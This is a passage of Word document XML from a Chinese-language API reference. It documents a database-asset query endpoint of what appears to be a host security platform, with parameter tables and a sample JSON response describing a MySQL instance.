          <w:p w14:paraId="22492D49" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C5B0935" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B7D1F3A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A23E058" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="75035CE6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6079DECA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E64C4EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AE36DE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41FBD411" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4B7C9E48" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D0FE3C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05A15B3A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A357A11" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1098A848" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="334EA034" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06D11EFB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F9E291A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="119B7A7A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14B65E5C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0CBC434E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A64A7E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32895D66" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AD0D2CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18338D31" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>数据库类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2BDBE8F4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D6ECB26" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>versions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E74330B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AD6F65A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43B5ADDE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>数据库版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="18372BE1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E84A12C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3127E83B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6304F1B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FB9712A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>监听端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3E1600EA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="179B257E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>confPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35FA0294" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5341BD42" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C06707C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>配置文件路径（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="064D207A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D2DEFDD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>logPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1657EFD8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4698DD01" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7163374B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>日志文件路径（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0044E0C8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57E38EE8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dataDir</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FEE4906" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="037456DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2134C3B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>数据路径（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D700CF4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EADE499" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/dbinfo/linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7027C8D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4150419C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "a4a6b8074259377e",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp": "192.168.199.200",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp": "192.168.199.200",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "192.168.199.200",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId": 41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup": "业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "安装了mysql或者DNSmasq",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "ubuntu",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "name": "mysql",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "version": "5.7.19-0ubuntu0.16.04.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "port": 3306,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "protoType": "tcp",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "user": "mysql",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bindIp": "127.0.0.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "confPath": "/etc/mysql/my.cnf",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "logPath": "/var/lib/mysql/ubuntu.log",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "dataDir": "/var/lib/mysql/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "pluginDir": "/usr/lib/mysql/plugin/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "rest": "false",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "auth": "disabled",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "web": "false",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "webPort": 60010,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "webAddress": "0.0.0.0",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "regionServer": ["localhost"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "dbName": "MSSQLSERVER_1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "loginModel": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "auditLevel": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "sysLogPath": "C:\Program Files\Microsoft SQL Server\MSSQL\data\mastlog.ldf",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "mainDbPath": "C:\Program Files\Microsoft SQL Server\MSSQL\data\master.mdf"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF1DA5C"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452"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5600"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="3ABC9BB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F52C959" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06033194" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4391B0DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="473AEDAB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="065A12BC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70AF09E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="061BF33C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="794EF246" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64B17172" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agent uuid,16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="20EEA11D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="488D747D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75BAB01B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1602EDB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0965C977" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0FC1C27E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DA7A8ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="240892AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77EF8CA6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BF3B70A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0F35CB7B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="174F16AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50256F1E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4724B94D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66E58BEC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3686D9FE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DCBF2FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3435D4CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10310D0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44CE39A9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="397D20BC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E65B7B1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F44FA02" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2438108B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
